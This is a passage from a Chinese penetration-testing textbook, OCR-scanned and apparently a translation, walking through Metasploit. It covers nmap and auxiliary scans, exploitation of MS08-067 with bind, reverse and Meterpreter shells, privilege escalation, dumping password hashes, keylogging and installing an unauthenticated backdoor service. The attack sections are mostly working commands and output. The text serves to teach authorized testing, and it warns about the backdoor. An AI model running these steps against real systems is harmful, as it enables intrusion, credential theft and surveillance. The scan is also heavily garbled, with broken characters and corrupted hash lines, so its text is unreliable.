列 出 当前 运行 的 全 部 后 台 模 板 。 用 户 可 通过 有 关 选 项 终止 当前 运行 的 模板 

把 某 个 (session id 指定 的 ) 会 话 连 接 到 的 主机 当 作 跳板 使 用 ， 让 它 转发 本 机 的 网 络 流量 


显示 指定 模板 (exploit. auxiliary 等 模板 ) 的 详细 信息 





set param value 


setg param value 


i ^N 
配置 当前 模板 的 参数 


设置 整个 框架 的 全 局 参数 ， 这 个 参数 会 对 全 部 exploit 和 auxilary 模板 通用 








unset param 


unsetg param 


是 set 命令 的 取消 命令 。 如 需 清楚 所 有 变量 ， 可 使 用 unset all 指令 
用 于 取消 一 个 或 多 个 全 局 变量 





sessions 


用 于 显示 (-1 选项 )、 切 换 (-i ID 选项 )、 终 止 会 话 (-k ID 选项 ) 


通过 模块 名 和 描述 来 方便 搜索 
选择 特定 的 渗透 测试 功能 模板 


下 一 人 小节 将 详细 讲解 这 些 命令 的 使 用 方法 ， 并 演示 整个 框架 各 个 模 
板 的 具体 功能 。 


search string 





use module 


9.3.2 MSFCLI 


MSFCLI 和 MSFConsole 相 似 ， 它 们 不 仅 都 采用 了 命令 行 界面 ， 而 且 
都 可 在 所 有 的 线程 中 操作 绝 大 多 数 的 模板 。 然 而 ，MSFCLI 的 自动 化 程 
度 没 有 MSFConsole 高 。 

如 需 启 动 msfcli， 可 在 终端 中 使 用 下 述 指令 。 

# msfcli —h 

上 述 指令 将 显示 所 有 可 用 的 模式 、 模 式 的 相关 说 明 ， 以 及 指令 所 需 
的 参数 。 请 注意 msfcli 需 要 使 用 等 号 给 参数 进行 赋值 ， 而 且 所 有 的 选项 
都 区 分 大 小 写 。 下 述 例子 演示 了 选 定 、 运 行 特定 exploit 模 板 的 具体 方 
UE. 








# msfcli windows/smb/ms08 . 067 netapi O 


[*] Please wait while we load the module tree... 


Name Current Setting Required Description 


RHOST yes The target address 
RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 
(BROWSER, 
SRVSVC) 


上 述 指令 结尾 处 的 选项 0， 用 于 显示 指定 exploit 的 全 部 选项 。 下 述 
指令 通过 RHOST 参 数 指定 目标 主机 的 IP 地 址 。 
# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P 


[*] Please wait while we load the module tree... 


Compatible payloads 
Name Description 
generic/debug trap Generate a debug trap in the target process 
generic/shell bind tcp Listen for a connection and spawn a 


command shell 


在 设置 好 RHOST 参 数 指定 了 目标 卫 之 后 ， 就 应 当选 取 可 行 的 
payload， 并 执行 我 们 选取 的 exploit。 

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST 
=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E 

[*] Please wait while we load the module tree... 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 


[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:4444 
192.168.0.7:1027) 

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 
Microsoft Corp. 

C:\WINDOWS\system32> 

上 述 信息 表明 ， 在 选 定 payload 并 设置 好 LHOST 参 数 之 后 ， 我 们 获 
取 了 目标 主机 的 本 地 shell 控 制 权 。 


9.3.3 信者 操练 101 


本 市 将 讲解 漏洞 利用 框架 的 各 种 使 用 方法 。 尺 管 不 可 能 完全 展现 
Metasploit 框 染 的 各 种 功能 ， 但 是 我 们 细致 地 挑选 了 几 个 案例 ， 演 示 了 
它 的 最 重要 的 功能 。 如 需 深 入 了 解 Metasploit 框 架 ， 请 参见 官方 的 在 线 
教程 MetasploitUnleashed: http://www.offensive-security.com/metasploit- 
unleashed/。 官 方 教程 深入 地 讲解 了 exploit 模 板 开 发 、 漏 洞 检测 以 及 各 种 
评估 技术 。 

场景 1 

这 个 场景 将 使 用 Metasploit 框 架 集 成 的 NMap 程 序 进 行 端口 扫描 、OS 
指纹 识别 ， 以 及 服务 鉴定 。 我 们 在 MSFConsole 中 执行 下 述 指令 。 


msf > load db_tracker 








[*] Successfully loaded plugin: db_tracker 

msf > db_nmap -T Aggressive -sV -n -O -v 192.168.0.7 

Starting Nmap 5.00 (http:/nmap.org ) at 2010-11-11 22:34 UTC 
NSE: Loaded 3 scripts for scanning. 

Initiating ARP Ping Scan at 22:34 


-> 


Scanning 192.168.0.7 [1 port] 

Completed ARP Ping Scan at 22:34, 0.00s elapsed (1 total hosts) 
Initiating SYN Stealth Scan at 22:34 

Scanning 192.168.0.7 [1000 ports] 

Discovered open port 445/tcp on 192.168.0.7 

Discovered open port 135/tcp on 192.168.0.7 

Discovered open port 25/tcp on 192.168.0.7 

Discovered open port 139/tcp on 192.168.0.7 

Discovered open port 3389/tcp on 192.168.0.7 

Discovered open port 80/tcp on 192.168.0.7 

Discovered open port 443/tcp on 192.168.0.7 

Discovered open port 21/tcp on 192.168.0.7 

Discovered open port 1025/tcp on 192.168.0.7 

Discovered open port 1433/tcp on 192.168.0.7 

Completed SYN Stealth Scan at 22:34, 3.04s elapsed (1000 total ports) 
Initiating Service scan at 22:34 

Scanning 10 services on 192.168.0.7 

Completed Service scan at 22:35, 15.15s elapsed (10 services on 1 host) 
Initiating OS detection (try #1) against 192.168.0.7 


PORT STATE SERVICE VERSION 


21/tcp open ftp Microsoft ftpd 
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 
80/tcp open http Microsoft IIS httpd 5.1 


135/tcp open msrpc Microsoft Windows RPC 
139/tcp open  netbios-ssn 
443/tcpopen https? 


445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds 

1025/tcp open msrpc Microsoft Windows RPC 

1433/tcp open ms-sgl-s Microsoft SQL Server 2005 9.00.1399; 
RTM 

3389/tcp open  microsoft-rdp Microsoft Terminal Service 

MAC Address: 00:0B:6B:68:19:91 (Wistron Neweb) 

Device type: general purpose 

Running: Microsoft Windows 2000|XP|2003 

OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - 
SP3, orWindows Server 2003 SPO - SP2 

Network Distance: 1 hop 

TCP Sequence Prediction: Difficulty=263 (Good luck!) 

IP ID Sequence Generation: Incremental 


Service Info: Host: custdesk; OS: Windows 


Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds 
Raw packets sent: 1026 (45.856K B) | Rcvd: 1024 (42.688K B) 

上 述 信息 表明 ， 现 在 已 经 成 功 对 目标 进行 扫描 ， 并 且 扫 描 结 果 已 经 
保存 在 当前 的 数据 库 会 话 中 。 如 需 碍 看 扫描 阶段 识别 出 来 的 目标 主机 和 
系统 服务 ， 可 单独 使 用 db _ hosts 和 db_services 指 令 。 另 外 ， 如 果 您 单独 
使 用 NMAP 程 序 扫 朱 过 目标 主机 ， 而 且 已 经 把 扫描 报告 保存 为 XML 格式 
的 文件 ， 那 么 可 以 使 用 db_import_nmap_xml 命 令 把 Nmap 的 扫描 报告 导 
入 到 Metasploit 的 数据 库 里 。 

场景 2 

这 个 场景 将 演示 Metasploit 框架 的 辅助 工具 Cauxiliaries) 模板 的 使 
用 方法 ， 旨 在 帮助 读者 了 解 辅助 工具 模板 在 渗透 测试 过 程 中 的 重要 作 
用 。 





SNMP 字 人 符 串 扫描 程序 

这 个 模板 可 以 对 指定 网 段 进行 SNMP (Simple Network Management 
Protocol) 扫描 ， 并 使 用 常见 的 团体 字符 对 SNMP 进 行 测试 ， 最 终 显示 它 
识别 出 来 的 SNMP 设 备 信息 。 我 们 来 看 : 


msf > search snmp 





[*] Searching loaded modules for pattern 'snmp'... 


Auxiliary 
Name Disclosure Date Rank Description 
scanner/snmp/aix version normal AIX SNMP 


Scanner AuxiliaryModule 
scanner/snmp/community normal SNMP 
Community 
Scanner 
msf > use auxiliary/scanner/snmp/community 
msf auxiliary(community) > show options 
Module options: 
Name Current Setting 


Required Description 


BATCHSIZE 256 yes 
The number of hosts to probe in each set 
CHOST no 


The local client address 


COMMUNITIES /opt/metasploit3/msf3/data/wordlists/snmp.txt 
no 


The list of communities that should be attempted per host 


RHOSTS yes 
The target address range or CIDR identifier 
RPORT 161 yes 
The target port 
THREADS 1 yes 


The number of concurrent threads 
msf auxiliary(community) > set RHOSTS 10.2.131.0/24 
RHOSTS => 10.2.131.0/24 
msf auxiliary(community) > set THREADS 3 
THREADS => 3 
msf auxiliary(community) > set BATCHSIZE 10 
BATCHSIZE => 10 
msf auxiliary(community) > run 
[*] >> progress (10.2.131.0-10.2.131.9) 0/170... 
[*] >> progress (10.2.131.10-10.2.131.19) 0/170... 
[*] >> progress (10.2.131.20-10.2.131.29) 0/170... 
[*] Scanned 030 of 256 hosts (011% complete) 
[*] >> progress (10.2.131.30-10.2.131.39) 0/170... 
[*] >> progress (10.2.131.40-10.2.131.49) 0/170... 
[*] >> progress (10.2.131.50-10.2.131.59) 0/170... 
[*] Scanned 060 of 256 hosts (023% complete) 
[*] >> progress (10.2.131.60-10.2.131.69) 0/170... 
[*] >> progress (10.2.131.70-10.2.131.79) 0/170... 
[*] Scanned 080 of 256 hosts (031% complete) 


[*] >> progress (10.2.131.80-10.2.131.89) 0/170... 

[*] >> progress (10.2.131.90-10.2.131.99) 0/170... 

[*] >> progress (10.2.131.100-10.2.131.109) 0/170... 

[*] 10.2.131.109 'public' 'HP ETHERNET MULTI- 
ENVIRONMENT,ROM none,JETDIRECT,JD128,EEPROM 
V.33.19,CIDATE 12/17/2008' 

[*] Scanned 110 of 256 hosts (042% complete) 


[*] >> progress (10.2.131.240-10.2.131.249) 0/170... 

[*] >> progress (10.2.131.250-10.2.131.255) 0/102... 

[*] Scanned 256 of 256 hosts (10096 complete) 

[*] Auxiliary module execution completed 

上 述 信息 表明 ， 程 序 识别 出 了 一 个 局 用 SNMP 功能 的 设备 ， 而 且 该 
设备 可 以 受理 团体 字符 串 public。 虽 然 通过 字符 串 public 获取 的 权限 只 
是 该 设备 的 只 读 权 限 ， 但 是 我 们 仍然 可 以 获取 大 量 有 价值 的 信息 。 这 些 
言 轧 可 能 包括 系统 数据 、 正 在 运行 的 服务 程序 、 网 络 地 址 、 版 本 号 和 补 
丁 信息 等 。 

VNC 空 密码 扫描 程序 

这 个 模板 将 会 扫描 指定 的 网 段 ， 以 搜索 可 以 使 用 空 密 码 访问 的 虚 机 
网 络 计算 (Virtual Network Computing, VNC) 服务 器 。 进 行 扫 描 的 指 
Wr. 


msf > use auxiliary/scanner/vnc/vnc none auth 








msf auxiliary(vnc none auth) » show options 

msf auxiliary(vnc none auth) » set RHOSTS 10.4.124.0/24 

RHOSTS => 10.4.124.0/24 

msf auxiliary(vnc none auth) > run 

[*] 10.4.124.22:5900, VNC server protocol version : "RFB 004.000", 


not supported! 

[*] 10.4.124.23:5900, VNC server protocol version : "RFB 004.000", 
not supported! 

[*] 10.4.124.25:5900, VNC server protocol version : "RFB 004.000",not 
supported! 

[*] Scanned 026 of 256 hosts (01096 complete) 

[*] 10.4.124.26:5900, VNC server protocol version : "RFB 004.000",not 
supported! 

[*] 10.4.124.27:5900, VNC server security types supported : None,free 
access! 

[*] 10.4.124.28:5900, VNC server security types supported : None,free 
access! 

[*] 10.4.124.29:5900, VNC server protocol version : "RFB 004.000",not 
supported! 


[*] 10.4.124.224:5900, VNC server protocol version : "RFB 
004.000", not supported! 
[*] 10.4.124.225:5900, VNC server protocol version : "RFB 


004.000", not supported! 
[*] 10.4.124.227:5900, VNC server security types supported : None,free 


access! 


[*] 10.4.124.228:5900, VNC server protocol version : "RFB 
004.000", not supported! 
[*] 10.4.124.229:5900, VNC server protocol version : "RFB 


004.000", not supported! 
[*] Scanned 231 of 256 hosts (09096 complete) 
[*] Scanned 256 of 256 hosts (10096 complete) 


[*] Auxiliary module execution completed 

上 述 信息 表明 ，Metasploit 框 架 确 实 找到 了 很 多 无 需 验证 就 可 访问 
的 VNC 服 务 器 。 知 不 采取 身份 认证 的 访问 控制 措施 ， 这 些 主机 将 会 招引 
不 速 之 客 访问 YNC 服 务 器 ， 终 将 成 为 系统 管理 员 的 一 大 威胁 。 

IIS6 WebDAV Unicode 身份 验证 旁 路 漏洞 

这 个 模板 将 会 扫描 指定 的 网 段 ， 以 搜索 存在 IS6 WebDAV WES 
路 漏洞 的 主机 。 局 动 扫 描 任务 的 指令 如 下 。 


msf > use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass 








msf auxiliary(ms09_020_webdav_unicode_bypass) > show options 
msf auxiliary(ms09_020_webdav_unicode_bypass) > set RHOSTS 
10.8.183.0/24 

RHOSTS => 10.8.183.0/24 

msf auxiliary(ms09_020_webdav_unicode_bypass) > set THREADS 10 
THREADS => 10 

msf auxiliary(ms09_020_webdav_unicode_bypass) > run 

[-] Folder does not require authentication. [302] 

[-] Folder does not require authentication. [400] 

[*] Confirmed protected folder http://10.8.183.9:80/ 401 (10.8.183.9) 
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [403] 

[-] Folder does not require authentication. [302] 

[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [501] 


[*] Confirmed protected folder http://10.8.183.162:80/ 
401(10.8.183.162) 


[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 


[*] Confirmed protected folder http://10.8.183.155:80/ 
401(10.8.183.155) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.166:80/ 
401(10.8.183.166) 

[*]Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.168:80/ 
401(10.8.183.168) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.167:80/ 
401(10.8.183.167) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 

[*] Confirmed protected folder http://10.8.183.171:80/ 
401(10.8.183.171) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [302] 

[*] Confirmed protected folder http://10.8.183.178:80/ 
401(10.8.183.178) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 

[-] Folder does not require authentication. [501] 

[*] Scanned 182 of 256 hosts (071% complete) 

[-] Folder does not require authentication. [501] 

[*] Confirmed protected folder http://10.8.183.183:80/ 
401(10.8.183.183) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [302] 

[*] Confirmed protected folder http://10.8.183.188:80/ 
401(10.8.183.188) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 


[-] Folder does not require authentication. [405] 

[*] Scanned 256 of 256 hosts (10096 complete) 

[*] Auxiliary module execution completed 

上 述 信息 表明 ，Metasploit 框架 完成 了 对 目标 网 段 的 扫描 ， 已 经 找 
到 了 存在 MS09-020 IIS6 WebDAV Unicode Authentication Bypass 漏 洞 的 
主机 。 或 许 ， 这 种 模板 有 助 于 我 们 发 现 网 络 中 配置 不 当 的 服务 器 ， 提 前 
发 现 安全 隐患 。 

场景 3 


这 个 场景 将 会 介绍 几 种 常见 的 payload (bind、reverse 和 meterpreter 
shell) ， 并 且 以 漏洞 利用 的 角度 探讨 它们 的 功能 。 这 些 实例 还 将 展示 
payload 的 使 用 方法 和 时 机 。 

bind shell 

bind《〈 绑 定型 ) shel 用 于 提供 远程 shell 连 接 。 在 成 功利 用 了 目标 主 
机 上 的 安全 漏洞 ， 并 且 成 功 执 行 了 shellcode 程 序 以 后 ， 渗 透 人 员 可 在 目 
标 主 机 上 的 特定 端口 上 运行 bind ”shell， 以 让 其 他 主机 继续 控制 这 台 主 
机 。 攻 击 人 员 可 以 使 用 基于 TCP 连接 的 标准 输入 输出 (stdin/stdout〉 隧 
道 工 具 〈 例 如 Netcat) 连接 到 被 攻破 的 主机 ， 通 过 bind shell 继续 实施 
控制 。 它 的 应 用 场合 与 Telnet 服务 器 /客户 问 十 分 相似 ， 主 要 适用 于 以 
NAT (Network Address Translation) 方式 连 入 网 络 的 渗透 人 员 、 攻 击 人 
员 的 设备 与 目标 主机 之 间 有 防火 墙 的 情况 ， 即 适用 于 无 法 从 被 测 主机 直 
接连 接 到 攻击 人 员 主 机 IP 的 各 种 情况 。 

可 通过 下 述 指令 利用 主机 漏洞 并 安装 bind shell. 


msf > use exploit/windows/smb/ms08_067_netapi 











msf exploit(ms08 067 netapi) > show options 

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08_067_netapi) > set PAYLOAD 
windows/shell/bind_tcp 

PAYLOAD => windows/shell/bind_tcp 

msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 


[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:41289 -> 

192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

CAWINDOWS'system32» 

AAR, Metasploit 通过 集成 的 payload 处 理 程序 自动 连接 到 

了 bind ”shell。 我 们 可 以 自己 编写 shellcode， 利 用 exploit 程序 安装 bind 
shell， 然 后 再 使 用 Netcat 这 类 第 三 方 Es bind shell. £j netcat 
在 网 络 安全 测试 中 的 各 种 用 | 请 参 


http://en.wikipedia.org/wiki/Netcat. 











reverse shell 

reverse 〈 反 射 型 ) shell 与 绑 定型 (bind) shell£&ZAA^ [i]. reverse 
shell 不 是 在 目标 机 器 上 绑 定 端口 ， 被 动 地 受理 攻击 人 员 的 机 器 连接 ， 而 
是 采用 反弹 的 方法 ， 让 被 测 主机 主动 地 连接 攻击 者 的 IP 和 端口 ， 并 提供 
一 个 shell。reverse shell 适 用 于 被 测 主机 采用 NAT 方 式 连接 网 络 的 情况 ， 
或 者 被 测 主 机 受 防火 墙 保护 而 使 渗透 人 员 不 能 从 外 网 直接 访问 被 测 主 机 
的 各 种 情况 。 

下 述 指令 可 设置 安装 reverse shell. 

msf > use exploit/windows/smb/ms08_067_netapi 

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08_067_netapi) > set PAYLOAD 
windows/shell/reverse_tcp 

PAYLOAD => windows/shell/reverse_tcp 

msf exploit(ms08 067 netapi) > show options 

msf exploit(ms08 067. netapi) > set LHOST 192.168.0.3 





LHOST => 192.168.0.3 

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:4444 -> 

192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> 

在 安装 reverse shell 时 需 配置 攻击 者 的 卫 《 例 如 LHOST 
192.168.0.3) ， 而 在 安装 〈 绑 定型 ) bind shell 则 没有 这 项 设置 。 

inline payload 和 staged payload 的 区 别 有 哪 些 ? 

inline payload 属 于 自主 型 shellcode， 它 的 shellcode 和 exploit 都 在 同一 
个 程序 文件 里 。 而 staged payload 在 两 台 主 机 之 间 建 立 通信 隧道 ， 并 通 
过 隧道 执行 shellcode 程 序 。 如 果 对 payload 的 文件 尺寸 有 严格 要 求 ， 那 么 
可 使 用 staged payload， 因 为 它 的 文件 尺寸 比 inline payload 的 文件 小 得 
多 。 

Meterpreter 

Meterpreter 是 一 种 先进 的 、 隐 蔽 的 、 多 功能 的 、 可 动态 扩展 的 
payload， 它 可 在 目标 主机 的 系统 内 存 里 注入 DLL (注入 的 DLL 完 全 不 会 
以 文件 形式 存在 ) 。 此 外 ， 它 还 文 持 在 运行 期 间 加 载 脚本 和 插件 。 在 漏 
洞 利用 的 后 期 阶段 ， 它 的 动态 加 载 特性 极 大 地 拓宽 了 渗透 人 员 的 作业 空 
间 ， 方 便 了 提 权 、 保 存 系统 账号 、 进 行 关 键 记 录 、 驻 留 性 后 门 服 务 、 开 








启 远 程 保 面 等 各 种 操作 。 默 认 情 况 下 ，Meterpreter shell 会 采用 全 程 加 密 
的 通信 方式 。 

可 通过 下 述 指令 利用 漏洞 并 安装 Meterpreter payload. 

msf > use exploit/windows/smb/ms08_067_netapi 

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08 067 netapi) > show payloads 





msf exploit(ms08_067_netapi) > set PAYLOAD 
windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 


msf exploit(ms08 067 netapi) > show options 


msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3 
LHOST => 192.168.0.3 

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 
192.168.0.7:1029) at Sun Nov 14 02:44:26 +0000 2010 


meterpreter > help 


通过 上 述 指令 ， 我 们 成 功 地 连接 到 了 被 测 主机 的 Meterpreter shell, 


然后 我 们 通过 viele a 的 命令 。 下 一 步 ， 我 们 要 查看 当前 用 户 
的 操作 权限 ， 然 后 通过 getsystem 脚 本 提升 自己 的 权限 为 系统 权限 。 
meterpreter > getuid 
Server username: CUSTDESK\salesdept 


meterpreter > use priv 





meterpreter > getsystem -h 


上 述 指令 将 会 显示 提升 权限 的 各 种 技术 。 如 果 不 启用 任何 选项 
接 使 用 MN Ads 会 逐一 尝试 各 种 提 权 技术 ， A 
权限 为 止 。 

meterpreter > getsystem 

...got system (via technique 1). 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 

meterpreter > sysinfo 

Computer: CUSTDESK 

OS : Windows XP (Build 2600, Service Pack 2). 

Arch : x86 

Language: en US 

如 果 在 指令 中 启用 exploit -j -z 选 项 ， 那 么 漏洞 利用 程序 将 会 在 后 台 
运行 ， Hd d d ME shell。 但 是 ， 如 果 程 序 成 功 建 
立 了 会 话 ， 您 可 以 通过 sessions -i id 指令 返回 shell 的 交互 界面 。 如 需 了 解 
AD, 可 使 用 sessions -] 指 令 碍 看 ID 的 确切 值 。 

接 下 来 ， 我 们 要 获取 被 测 主机 的 系统 账户 和 密码 。Windows 以 
NTLM 哈 希 (hash》〉 的 格式 保存 用 户 的 账号 信息 。 很 多 工具 和 技术 都 可 
以 破解 NTLM 哈 希 。 现 在 我 们 一 起 见证 Meterpreter 的 真正 威力 。 


meterpreter > run hashdump 











[*] Obtaining the boot key... 

[*] Calculating the hboot key using SYSKEY 
71e52ce6b86e5da0c213566a123 

6f892... 

[*] Obtaining the user list and keys... 

[*] Decrypting user keys... 

[*] Dumping password hashes... 

h 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16a 
0c089c0::: 

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73 
9c0::: 

HelpAssistant:1000:d2cd5d550e14593b12787245127c866d:d3e35f657ct 
811d2d986df9::: 

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8ed: 
2835ec013cfb9c5::: 

Momin 
Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a7692( 
beb12283678::: 

IUSR_MOMINDESK:1004:a751dcb6ea9323026eb8£7854da74a24:b019 
6b80e02744513::: 

ASPNET:1005:ad785822 109dd077027175f3382059fd:21ff86d627bcf38 
8eldd::: 

IWAM_MOMINDESK:1009:12a75a1d0cf47cd0c8e2f82a92190b42:c74! 
196e00f94e113::: 

h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a7692' 
12283678::: 


salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77fa 
377b1693::: 

接 下 来 ， 我 们 通过 Meterpreter shell 运行 keylog 程序 ， 记 录 键 盘 输 入 
的 内 容 。 键 盘 敲 击 记录 可 能 含有 目标 主机 的 多 项 敏感 信息 。 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 


meterpreter > ps 





Process list 


PID Name Arch Session User Path 
0 [System Process] 
4 System x86 0 NT AUTHORITY\SYSTEM 
384 smss.exe x86 0 NT 
AUTHORITY\SYSTEM 
\SystemRoot\System32\smss.exe 
488 csrss.exe x86 0 NT 
AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\csrss.exe 
648 winlogon.exe x86 0 NT 
AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\winlogon.exe 
692 services.exe x86 0 NT 
AUTHORITY\SYSTEM 
C:\WINDOWS\system32\services.exe 
704 Isass.exe x86 0 NT 


AUTHORITY\SYSTEM 


C:\WINDOWS\system32\Isass.exe 


148 alg.exe x86 0 NT AUTHORITY\LOCAL 
SERVICE 

C:\WINDOWS\System32\alg.exe 

3172 explorer.exe x86 0 CUSTDESKsNsalesdept 
C:\WINDOWS\Explorer.EXE 

3236 reader_sl.exe x86 0 CUSTDESK\salesdept 
C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe 
接 下 来 ， 我 们 把 Meterpreter shell 插入 explorer.exe 的 进程 

(3172〉， 以 便 开始 记录 当前 用 户 对 系统 的 操作 ， 所 涉及 的 指令 如 下 。 

meterpreter > migrate 3172 
[*] Migrating to 3172... 


[*] Migration completed successfully. 





meterpreter > getuid 
Server username: CUSTDESK\salesdept 
meterpreter > keyscan_start 


Starting the keystroke sniffer... 
SUE ur ASERIK EF. NB. RASERET RAER 








meterpreter > keyscan_dump 
Dumping captured keystrokes... 
<Return> www.yahoo.com <Return> <Back> www.bbc.co.uk 
<Return> 
meterpreter > keyscan_stop 
Stopping the keystroke sniffer... 
上 述 信息 表明 ， 键 盘 记 录 程 序 记 录 了 被 测 主机 的 网 上 活动 。 类 似 





地 ， 我 们 可 以 把 它 注入 到 winlogon.exe (pid 648) 进程 里 ， 获 取 所 有 账 
户 的 登录 信息 。 

经 过 上 述 操作 ， 我 们 已 经 获取 了 被 测 主机 的 操作 权限 。 但 是 如 采 目 
标 主机 安装 了 漏洞 修复 程序 的 补丁 ， 我 们 就 无 法 利用 原 有 漏洞 攻击 有 关 
服务 或 应 用 程序 。 为 了 避免 这 一 情况 ,我们 可 以 通过 常人 所 说 的 “后 
门 ” 服 务 程 序 维护 自己 对 目标 主机 的 控制 。 务 必要 注意 : 一 旦 在 被 测 主 
机 上 安装 了 Meterpreter 提 供 的 后 门 服务 程序 ， 所 有 人 都 可 以 控制 被 测 主 
机 ; 因为 这 个 后 面 服务 程序 不 对 连 入 的 控制 端 进行 身份 验证 。 换 句 话 
说 ， 这 个 程序 可 能 会 让 不 请 自 来 的 人 控制 被 测 主机 ， 这 无 颖 是 对 被 测 单 
位 形成 了 安全 威胁 。 在 正式 的 渗透 测试 业务 中 ， 这 种 有 利于 第 三 方 攻击 
的 行为 通常 都 被 服务 合同 明文 禁止 。 所 以 ， 我 们 不 建议 您 在 正式 的 测试 
环境 中 使 用 Meterpreter 提供 的 后 门 服务 程序 。 您 也 应 当 在 拟定 合同 的 
范围 界定 阶段 明确 有 关 规 则 。 

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 




















[*] Fingerprint: Windows XP Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 
192.168.0.7:1032) at Tue Nov 16 19:21:39 +0000 2010 


meterpreter > ps 


292 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE 
C:\WINDOWS\System32\alg.exe 
1840 csrss.exe x86 2 NT AUTHORITY\SYSTEM 


\??\C:\WINDOWS\system32\csrss.exe 

528 winlogon.exe x86 2 NT AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\winlogon.exe 

240 rdpclip.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\system32\rdpclip.exe 

1060 userinit.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\system32\userinit.exe 

1544 explorer.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\Explorer.EXE 


meterpreter > migrate 1544 
[*] Migrating to 1544... 
[*] Migration completed successfully. 


meterpreter > run metsvc -h 


meterpreter > run metsvc 
[*] Creating a meterpreter service on port 31337 
[*] Creating a temporary installation directory 
C:\DOCUME ~ 1\MOMIND ~ 1NLOCALS ~1\Temp\oNyLOPesS... 
[*] >> Uploading metsrv.dll... 
[*] >> Uploading metsvc-server.exe... 
[*] >> Uploading metsvc.exe... 
[*] Starting the service... 
* Installing service metsvc 
* Starting service 


Service metsvc successfully installed. 


通过 上 述 指令 ， 我 们 在 被 测 主 机 上 安装 了 后 门 服务 程序 ， 现 在 可 以 


